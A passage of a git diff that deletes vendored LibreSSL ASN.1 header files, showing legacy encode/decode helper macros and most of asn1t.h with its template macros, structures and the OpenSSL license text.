-/* Don't use this with d2i_ASN1_BOOLEAN() */
-#define M_ASN1_D2I_get(b, func) \
-	c.q=c.p; \
-	if (func(&(b),&c.p,c.slen) == NULL) \
-		{c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-/* Don't use this with d2i_ASN1_BOOLEAN() */
-#define M_ASN1_D2I_get_x(type,b,func) \
-	c.q=c.p; \
-	if (((D2I_OF(type))func)(&(b),&c.p,c.slen) == NULL) \
-		{c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-/* use this instead () */
-#define M_ASN1_D2I_get_int(b,func) \
-	c.q=c.p; \
-	if (func(&(b),&c.p,c.slen) < 0) \
-		{c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-#define M_ASN1_D2I_get_opt(b,func,type) \
-	if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) \
-		== (V_ASN1_UNIVERSAL|(type)))) \
-		{ \
-		M_ASN1_D2I_get(b,func); \
-		}
-
-#define M_ASN1_D2I_get_int_opt(b,func,type) \
-	if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) \
-		== (V_ASN1_UNIVERSAL|(type)))) \
-		{ \
-		M_ASN1_D2I_get_int(b,func); \
-		}
-
-#define M_ASN1_D2I_get_imp(b,func, type) \
-	M_ASN1_next=(_tmp& V_ASN1_CONSTRUCTED)|type; \
-	c.q=c.p; \
-	if (func(&(b),&c.p,c.slen) == NULL) \
-		{c.line=__LINE__; M_ASN1_next_prev = _tmp; goto err; } \
-	c.slen-=(c.p-c.q);\
-	M_ASN1_next_prev=_tmp;
-
-#define M_ASN1_D2I_get_IMP_opt(b,func,tag,type) \
-	if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) == \
-		(V_ASN1_CONTEXT_SPECIFIC|(tag)))) \
-		{ \
-		unsigned char _tmp = M_ASN1_next; \
-		M_ASN1_D2I_get_imp(b,func, type);\
-		}
-
-#define M_ASN1_D2I_get_set_type(type,r,func,free_func) \
-		M_ASN1_D2I_get_imp_set_type(type,r,func,free_func, \
-			V_ASN1_SET,V_ASN1_UNIVERSAL);
-
-#define M_ASN1_D2I_get_set_opt_type(type,r,func,free_func) \
-	if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
-		V_ASN1_CONSTRUCTED|V_ASN1_SET)))\
-		{ M_ASN1_D2I_get_set_type(type,r,func,free_func); }
-
-#define M_ASN1_I2D_len_SET_opt(a,f) \
-	if ((a != NULL) && (sk_num(a) != 0)) \
-		M_ASN1_I2D_len_SET(a,f);
-
-#define M_ASN1_I2D_put_SET_opt(a,f) \
-	if ((a != NULL) && (sk_num(a) != 0)) \
-		M_ASN1_I2D_put_SET(a,f);
-
-#define M_ASN1_I2D_put_SEQUENCE_opt(a,f) \
-	if ((a != NULL) && (sk_num(a) != 0)) \
-		M_ASN1_I2D_put_SEQUENCE(a,f);
-
-#define M_ASN1_I2D_put_SEQUENCE_opt_type(type,a,f) \
-	if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-		M_ASN1_I2D_put_SEQUENCE_type(type,a,f);
-
-#define M_ASN1_D2I_get_IMP_set_opt_type(type,b,func,free_func,tag) \
-	if ((c.slen != 0) && \
-		(M_ASN1_next == \
-		(V_ASN1_CONTEXT_SPECIFIC|V_ASN1_CONSTRUCTED|(tag))))\
-		{ \
-		M_ASN1_D2I_get_imp_set_type(type,b,func,free_func,\
-			tag,V_ASN1_CONTEXT_SPECIFIC); \
-		}
-
-#define M_ASN1_D2I_get_seq_type(type,r,func,free_func) \
-		M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,\
-					    V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL)
-
-#define M_ASN1_D2I_get_seq_opt_type(type,r,func,free_func) \
-	if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
-		V_ASN1_CONSTRUCTED|V_ASN1_SEQUENCE)))\
-		{ M_ASN1_D2I_get_seq_type(type,r,func,free_func); }
-
-#define M_ASN1_D2I_get_IMP_set_type(type,r,func,free_func,x) \
-		M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,\
-			x,V_ASN1_CONTEXT_SPECIFIC);
-
-#define M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,a,b) \
-	c.q=c.p; \
-	if (d2i_ASN1_SET_OF_##type(&(r),&c.p,c.slen,func,\
-				   free_func,a,b) == NULL) \
-		{ c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-#define M_ASN1_D2I_get_set_strings(r,func,a,b) \
-	c.q=c.p; \
-	if (d2i_ASN1_STRING_SET(&(r),&c.p,c.slen,a,b) == NULL) \
-		{ c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-#define M_ASN1_D2I_get_EXP_opt(r,func,tag) \
-	if ((c.slen != 0L) && (M_ASN1_next == \
-		(V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
-		{ \
-		int Tinf,Ttag,Tclass; \
-		long Tlen; \
-		\
-		c.q=c.p; \
-		Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
-		if (Tinf & 0x80) \
-			{ c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
-			c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
-					Tlen = c.slen - (c.p - c.q) - 2; \
-		if (func(&(r),&c.p,Tlen) == NULL) \
-			{ c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
-			Tlen = c.slen - (c.p - c.q); \
-			if(!ASN1_const_check_infinite_end(&c.p, Tlen)) \
-				{ c.error=ERR_R_MISSING_ASN1_EOS; \
-				c.line=__LINE__; goto err; } \
-		}\
-		c.slen-=(c.p-c.q); \
-		}
-
-#define M_ASN1_D2I_get_EXP_set_opt_type(type,r,func,free_func,tag,b) \
-	if ((c.slen != 0) && (M_ASN1_next == \
-		(V_ASN1_CONSTRUCTED|V_ASN1_CONTEXT_SPECIFIC|tag))) \
-		{ \
-		int Tinf,Ttag,Tclass; \
-		long Tlen; \
-		\
-		c.q=c.p; \
-		Tinf=ASN1_get_object(&c.p,&Tlen,&Ttag,&Tclass,c.slen); \
-		if (Tinf & 0x80) \
-			{ c.error=ERR_R_BAD_ASN1_OBJECT_HEADER; \
-			c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) \
-					Tlen = c.slen - (c.p - c.q) - 2; \
-		if (d2i_ASN1_SET_OF_##type(&(r),&c.p,Tlen,func, \
-			free_func,b,V_ASN1_UNIVERSAL) == NULL) \
-			{ c.line=__LINE__; goto err; } \
-		if (Tinf == (V_ASN1_CONSTRUCTED+1)) { \
-			Tlen = c.slen - (c.p - c.q); \
-			if(!ASN1_check_infinite_end(&c.p, Tlen)) \
-				{ c.error=ERR_R_MISSING_ASN1_EOS; \
-				c.line=__LINE__; goto err; } \
-		}\
-		c.slen-=(c.p-c.q); \
-		}
-
-/* BIG UGLY WARNING!  This is so damn ugly I wanna puke.  Unfortunately,
-   some macros that use ASN1_const_CTX still insist on writing in the input
-   stream.  ARGH!  ARGH!  ARGH!  Let's get rid of this macro package.
-   Please?						-- Richard Levitte */
-#define M_ASN1_next		(*((unsigned char *)(c.p)))
-#define M_ASN1_next_prev	(*((unsigned char *)(c.q)))
-
-/*************************************************/
-
-#define M_ASN1_I2D_vars(a)	int r=0,ret=0; \
-				unsigned char *p; \
-				if (a == NULL) return(0)
-
-/* Length Macros */
-#define M_ASN1_I2D_len(a,f)	ret+=f(a,NULL)
-#define M_ASN1_I2D_len_IMP_opt(a,f)	if (a != NULL) M_ASN1_I2D_len(a,f)
-
-#define M_ASN1_I2D_len_SET_type(type,a,f) \
-		ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,V_ASN1_SET, \
-					    V_ASN1_UNIVERSAL,IS_SET);
-
-#define M_ASN1_I2D_len_SEQUENCE_type(type,a,f) \
-		ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,V_ASN1_SEQUENCE, \
-					    V_ASN1_UNIVERSAL,IS_SEQUENCE)
-
-#define M_ASN1_I2D_len_SEQUENCE_opt(a,f) \
-		if ((a != NULL) && (sk_num(a) != 0)) \
-			M_ASN1_I2D_len_SEQUENCE(a,f);
-
-#define M_ASN1_I2D_len_SEQUENCE_opt_type(type,a,f) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			M_ASN1_I2D_len_SEQUENCE_type(type,a,f);
-
-#define M_ASN1_I2D_len_IMP_SET_type(type,a,f,x) \
-		ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
-					    V_ASN1_CONTEXT_SPECIFIC,IS_SET);
-
-#define M_ASN1_I2D_len_IMP_SET_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
-					       V_ASN1_CONTEXT_SPECIFIC,IS_SET);
-
-#define M_ASN1_I2D_len_IMP_SEQUENCE_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			ret+=i2d_ASN1_SET_OF_##type(a,NULL,f,x, \
-						    V_ASN1_CONTEXT_SPECIFIC, \
-						    IS_SEQUENCE);
-
-#define M_ASN1_I2D_len_EXP_opt(a,f,mtag,v) \
-		if (a != NULL)\
-			{ \
-			v=f(a,NULL); \
-			ret+=ASN1_object_size(1,v,mtag); \
-			}
-
-#define M_ASN1_I2D_len_EXP_SEQUENCE_opt_type(type,a,f,mtag,tag,v) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0))\
-			{ \
-			v=i2d_ASN1_SET_OF_##type(a,NULL,f,tag, \
-						 V_ASN1_UNIVERSAL, \
-						 IS_SEQUENCE); \
-			ret+=ASN1_object_size(1,v,mtag); \
-			}
-
-/* Put Macros */
-#define M_ASN1_I2D_put(a,f)	f(a,&p)
-
-#define M_ASN1_I2D_put_IMP_opt(a,f,t)	\
-		if (a != NULL) \
-			{ \
-			unsigned char *q=p; \
-			f(a,&p); \
-			*q=(V_ASN1_CONTEXT_SPECIFIC|t|(*q&V_ASN1_CONSTRUCTED));\
-			}
-
-#define M_ASN1_I2D_put_SET_type(type,a,f) \
-     i2d_ASN1_SET_OF_##type(a,&p,f,V_ASN1_SET,V_ASN1_UNIVERSAL,IS_SET)
-#define M_ASN1_I2D_put_IMP_SET_type(type,a,f,x) \
-     i2d_ASN1_SET_OF_##type(a,&p,f,x,V_ASN1_CONTEXT_SPECIFIC,IS_SET)
-
-#define M_ASN1_I2D_put_SEQUENCE_type(type,a,f) \
-     i2d_ASN1_SET_OF_##type(a,&p,f,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL, \
-			    IS_SEQUENCE)
-
-#define M_ASN1_I2D_put_SEQUENCE_opt(a,f) \
-		if ((a != NULL) && (sk_num(a) != 0)) \
-			M_ASN1_I2D_put_SEQUENCE(a,f);
-
-#define M_ASN1_I2D_put_IMP_SET_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			{ i2d_ASN1_SET_OF_##type(a,&p,f,x, \
-						 V_ASN1_CONTEXT_SPECIFIC, \
-						 IS_SET); }
-
-#define M_ASN1_I2D_put_IMP_SEQUENCE_opt_type(type,a,f,x) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			{ i2d_ASN1_SET_OF_##type(a,&p,f,x, \
-						 V_ASN1_CONTEXT_SPECIFIC, \
-						 IS_SEQUENCE); }
-
-#define M_ASN1_I2D_put_EXP_opt(a,f,tag,v) \
-		if (a != NULL) \
-			{ \
-			ASN1_put_object(&p,1,v,tag,V_ASN1_CONTEXT_SPECIFIC); \
-			f(a,&p); \
-			}
-
-#define M_ASN1_I2D_put_EXP_SEQUENCE_opt_type(type,a,f,mtag,tag,v) \
-		if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-			{ \
-			ASN1_put_object(&p,1,v,mtag,V_ASN1_CONTEXT_SPECIFIC); \
-			i2d_ASN1_SET_OF_##type(a,&p,f,tag,V_ASN1_UNIVERSAL, \
-					       IS_SEQUENCE); \
-			}
-
-#define M_ASN1_I2D_seq_total() \
-		r=ASN1_object_size(1,ret,V_ASN1_SEQUENCE); \
-		if (pp == NULL) return(r); \
-		p= *pp; \
-		ASN1_put_object(&p,1,ret,V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL)
-
-#define M_ASN1_I2D_INF_seq_start(tag,ctx) \
-		*(p++)=(V_ASN1_CONSTRUCTED|(tag)|(ctx)); \
-		*(p++)=0x80
-
-#define M_ASN1_I2D_INF_seq_end() *(p++)=0x00; *(p++)=0x00
-
-#define M_ASN1_I2D_finish()	*pp=p; \
-				return(r);
-
-int asn1_GetSequence(ASN1_const_CTX *c, long *length);
-void asn1_add_error(const unsigned char *address, int offset);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/asn1t.h b/thirdparty/libressl/include/openssl/asn1t.h
deleted file mode 100644
index ba380bd..0000000
--- a/thirdparty/libressl/include/openssl/asn1t.h
+++ /dev/null
@@ -1,880 +0,0 @@
-/* $OpenBSD: asn1t.h,v 1.14 2016/12/27 15:12:51 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project 2000.
- */
-/* ====================================================================
- * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_ASN1T_H
-#define HEADER_ASN1T_H
-
-#include <stddef.h>
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/asn1.h>
-
-/* ASN1 template defines, structures and functions */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Macro to obtain ASN1_ADB pointer from a type (only used internally) */
-#define ASN1_ADB_ptr(iptr) ((const ASN1_ADB *)(iptr))
-
-
-/* Macros for start and end of ASN1_ITEM definition */
-
-#define ASN1_ITEM_start(itname) \
-	const ASN1_ITEM itname##_it = {
-
-#define ASN1_ITEM_end(itname) \
-		};
-
-
-
-/* Macros to aid ASN1 template writing */
-
-#define ASN1_ITEM_TEMPLATE(tname) \
-	static const ASN1_TEMPLATE tname##_item_tt 
-
-#define ASN1_ITEM_TEMPLATE_END(tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_PRIMITIVE,\
-		-1,\
-		&tname##_item_tt,\
-		0,\
-		NULL,\
-		0,\
-		#tname \
-	ASN1_ITEM_end(tname)
-
-
-/* This is a ASN1 type which just embeds a template */
- 
-/* This pair helps declare a SEQUENCE. We can do:
- *
- * 	ASN1_SEQUENCE(stname) = {
- * 		... SEQUENCE components ...
- * 	} ASN1_SEQUENCE_END(stname)
- *
- * 	This will produce an ASN1_ITEM called stname_it
- *	for a structure called stname.
- *
- * 	If you want the same structure but a different
- *	name then use:
- *
- * 	ASN1_SEQUENCE(itname) = {
- * 		... SEQUENCE components ...
- * 	} ASN1_SEQUENCE_END_name(stname, itname)
- *
- *	This will create an item called itname_it using
- *	a structure called stname.
- */
-
-#define ASN1_SEQUENCE(tname) \
-	static const ASN1_TEMPLATE tname##_seq_tt[] 
-
-#define ASN1_SEQUENCE_END(stname) ASN1_SEQUENCE_END_name(stname, stname)
-
-#define ASN1_SEQUENCE_END_name(stname, tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		NULL,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_NDEF_SEQUENCE(tname) \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_NDEF_SEQUENCE_cb(tname, cb) \
-	ASN1_SEQUENCE_cb(tname, cb)
-
-#define ASN1_SEQUENCE_cb(tname, cb) \
-	static const ASN1_AUX tname##_aux = {NULL, 0, 0, 0, cb, 0}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_BROKEN_SEQUENCE(tname) \
-	static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_BROKEN, 0, 0, 0, 0}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_SEQUENCE_ref(tname, cb, lck) \
-	static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_REFCOUNT, offsetof(tname, references), lck, cb, 0}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_SEQUENCE_enc(tname, enc, cb) \
-	static const ASN1_AUX tname##_aux = {NULL, ASN1_AFLG_ENCODING, 0, 0, cb, offsetof(tname, enc)}; \
-	ASN1_SEQUENCE(tname)
-
-#define ASN1_NDEF_SEQUENCE_END(tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_NDEF_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		NULL,\
-		sizeof(tname),\
-		#tname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_BROKEN_SEQUENCE_END(stname) ASN1_SEQUENCE_END_ref(stname, stname)
-
-#define ASN1_SEQUENCE_END_enc(stname, tname) ASN1_SEQUENCE_END_ref(stname, tname)
-
-#define ASN1_SEQUENCE_END_cb(stname, tname) ASN1_SEQUENCE_END_ref(stname, tname)
-
-#define ASN1_SEQUENCE_END_ref(stname, tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		&tname##_aux,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_NDEF_SEQUENCE_END_cb(stname, tname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_NDEF_SEQUENCE,\
-		V_ASN1_SEQUENCE,\
-		tname##_seq_tt,\
-		sizeof(tname##_seq_tt) / sizeof(ASN1_TEMPLATE),\
-		&tname##_aux,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-
-/* This pair helps declare a CHOICE type. We can do:
- *
- * 	ASN1_CHOICE(chname) = {
- * 		... CHOICE options ...
- * 	ASN1_CHOICE_END(chname)
- *
- * 	This will produce an ASN1_ITEM called chname_it
- *	for a structure called chname. The structure
- *	definition must look like this:
- *	typedef struct {
- *		int type;
- *		union {
- *			ASN1_SOMETHING *opt1;
- *			ASN1_SOMEOTHER *opt2;
- *		} value;
- *	} chname;
- *	
- *	the name of the selector must be 'type'.
- * 	to use an alternative selector name use the
- *      ASN1_CHOICE_END_selector() version.
- */
-
-#define ASN1_CHOICE(tname) \
-	static const ASN1_TEMPLATE tname##_ch_tt[] 
-
-#define ASN1_CHOICE_cb(tname, cb) \
-	static const ASN1_AUX tname##_aux = {NULL, 0, 0, 0, cb, 0}; \
-	ASN1_CHOICE(tname)
-
-#define ASN1_CHOICE_END(stname) ASN1_CHOICE_END_name(stname, stname)
-
-#define ASN1_CHOICE_END_name(stname, tname) ASN1_CHOICE_END_selector(stname, tname, type)
-
-#define ASN1_CHOICE_END_selector(stname, tname, selname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_CHOICE,\
-		offsetof(stname,selname) ,\
-		tname##_ch_tt,\
-		sizeof(tname##_ch_tt) / sizeof(ASN1_TEMPLATE),\
-		NULL,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-#define ASN1_CHOICE_END_cb(stname, tname, selname) \
-	;\
-	ASN1_ITEM_start(tname) \
-		ASN1_ITYPE_CHOICE,\
-		offsetof(stname,selname) ,\
-		tname##_ch_tt,\
-		sizeof(tname##_ch_tt) / sizeof(ASN1_TEMPLATE),\
-		&tname##_aux,\
-		sizeof(stname),\
-		#stname \
-	ASN1_ITEM_end(tname)
-
-/* This helps with the template wrapper form of ASN1_ITEM */
-
-#define ASN1_EX_TEMPLATE_TYPE(flags, tag, name, type) { \
-	(flags), (tag), 0,\
-	#name, ASN1_ITEM_ref(type) }
-
-/* These help with SEQUENCE or CHOICE components */
-
-/* used to declare other types */
-
-#define ASN1_EX_TYPE(flags, tag, stname, field, type) { \
-	(flags), (tag), offsetof(stname, field),\
-	#field, ASN1_ITEM_ref(type) }
-
-/* used when the structure is combined with the parent */
-
-#define ASN1_EX_COMBINE(flags, tag, type) { \
-	(flags)|ASN1_TFLG_COMBINE, (tag), 0, NULL, ASN1_ITEM_ref(type) }
-
-/* implicit and explicit helper macros */
-
-#define ASN1_IMP_EX(stname, field, type, tag, ex) \
-		ASN1_EX_TYPE(ASN1_TFLG_IMPLICIT | ex, tag, stname, field, type)
-
-#define ASN1_EXP_EX(stname, field, type, tag, ex) \
-		ASN1_EX_TYPE(ASN1_TFLG_EXPLICIT | ex, tag, stname, field, type)
-
-/* Any defined by macros: the field used is in the table itself */
-
-#define ASN1_ADB_OBJECT(tblname) { ASN1_TFLG_ADB_OID, -1, 0, #tblname, (const ASN1_ITEM *)&(tblname##_adb) }
-#define ASN1_ADB_INTEGER(tblname) { ASN1_TFLG_ADB_INT, -1, 0, #tblname, (const ASN1_ITEM *)&(tblname##_adb) }
-/* Plain simple type */
-#define ASN1_SIMPLE(stname, field, type) ASN1_EX_TYPE(0,0, stname, field, type)
-
-/* OPTIONAL simple type */
-#define ASN1_OPT(stname, field, type) ASN1_EX_TYPE(ASN1_TFLG_OPTIONAL, 0, stname, field, type)
-
-/* IMPLICIT tagged simple type */
-#define ASN1_IMP(stname, field, type, tag) ASN1_IMP_EX(stname, field, type, tag, 0)
-
-/* IMPLICIT tagged OPTIONAL simple type */
-#define ASN1_IMP_OPT(stname, field, type, tag) ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL)
-
-/* Same as above but EXPLICIT */
-
-#define ASN1_EXP(stname, field, type, tag) ASN1_EXP_EX(stname, field, type, tag, 0)
-#define ASN1_EXP_OPT(stname, field, type, tag) ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL)
-
-/* SEQUENCE OF type */
-#define ASN1_SEQUENCE_OF(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, stname, field, type)
-
-/* OPTIONAL SEQUENCE OF */
-#define ASN1_SEQUENCE_OF_OPT(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL, 0, stname, field, type)
-
-/* Same as above but for SET OF */
-
-#define ASN1_SET_OF(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SET_OF, 0, stname, field, type)
-
-#define ASN1_SET_OF_OPT(stname, field, type) \
-		ASN1_EX_TYPE(ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL, 0, stname, field, type)
-
-/* Finally compound types of SEQUENCE, SET, IMPLICIT, EXPLICIT and OPTIONAL */
-
-#define ASN1_IMP_SET_OF(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF)
-
-#define ASN1_EXP_SET_OF(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF)
-
-#define ASN1_IMP_SET_OF_OPT(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL)
-
-#define ASN1_EXP_SET_OF_OPT(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SET_OF|ASN1_TFLG_OPTIONAL)
-
-#define ASN1_IMP_SEQUENCE_OF(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF)
-
-#define ASN1_IMP_SEQUENCE_OF_OPT(stname, field, type, tag) \
-			ASN1_IMP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL)
-
-#define ASN1_EXP_SEQUENCE_OF(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF)
-
-#define ASN1_EXP_SEQUENCE_OF_OPT(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_SEQUENCE_OF|ASN1_TFLG_OPTIONAL)
-
-/* EXPLICIT using indefinite length constructed form */
-#define ASN1_NDEF_EXP(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_NDEF)
-
-/* EXPLICIT OPTIONAL using indefinite length constructed form */
-#define ASN1_NDEF_EXP_OPT(stname, field, type, tag) \
-			ASN1_EXP_EX(stname, field, type, tag, ASN1_TFLG_OPTIONAL|ASN1_TFLG_NDEF)
-
-/* Macros for the ASN1_ADB structure */
-
-#define ASN1_ADB(name) \
-	static const ASN1_ADB_TABLE name##_adbtbl[] 
-
-
-#define ASN1_ADB_END(name, flags, field, app_table, def, none) \
-	;\
-	static const ASN1_ADB name##_adb = {\
-		flags,\
-		offsetof(name, field),\
-		app_table,\
-		name##_adbtbl,\
-		sizeof(name##_adbtbl) / sizeof(ASN1_ADB_TABLE),\
-		def,\
-		none\
-	}
-
-
-#define ADB_ENTRY(val, template) {val, template}
-
-#define ASN1_ADB_TEMPLATE(name) \
-	static const ASN1_TEMPLATE name##_tt 
-
-#endif /* !LIBRESSL_INTERNAL */
-
-/* This is the ASN1 template structure that defines
- * a wrapper round the actual type. It determines the
- * actual position of the field in the value structure,
- * various flags such as OPTIONAL and the field name.
- */
-
-struct ASN1_TEMPLATE_st {
-unsigned long flags;		/* Various flags */
-long tag;			/* tag, not used if no tagging */
-unsigned long offset;		/* Offset of this field in structure */
-#ifndef NO_ASN1_FIELD_NAMES
-const char *field_name;		/* Field name */
-#endif
-ASN1_ITEM_EXP *item;		/* Relevant ASN1_ITEM or ASN1_ADB */
-};
-
-/* Macro to extract ASN1_ITEM and ASN1_ADB pointer from ASN1_TEMPLATE */
-
-#define ASN1_TEMPLATE_item(t) (t->item_ptr)
-#define ASN1_TEMPLATE_adb(t) (t->item_ptr)
-
-typedef struct ASN1_ADB_TABLE_st ASN1_ADB_TABLE;
-typedef struct ASN1_ADB_st ASN1_ADB;
-
-struct ASN1_ADB_st {
-	unsigned long flags;	/* Various flags */
-	unsigned long offset;	/* Offset of selector field */
-	STACK_OF(ASN1_ADB_TABLE) **app_items; /* Application defined items */
-	const ASN1_ADB_TABLE *tbl;	/* Table of possible types */
-	long tblcount;		/* Number of entries in tbl */
-	const ASN1_TEMPLATE *default_tt;  /* Type to use if no match */
-	const ASN1_TEMPLATE *null_tt;  /* Type to use if selector is NULL */
-};
-
-struct ASN1_ADB_TABLE_st {
-	long value;		/* NID for an object or value for an int */
-	const ASN1_TEMPLATE tt;		/* item for this value */
-};
-
-/* template flags */
-
-/* Field is optional */
-#define ASN1_TFLG_OPTIONAL	(0x1)
-
-/* Field is a SET OF */
-#define ASN1_TFLG_SET_OF	(0x1 << 1)
-
-/* Field is a SEQUENCE OF */
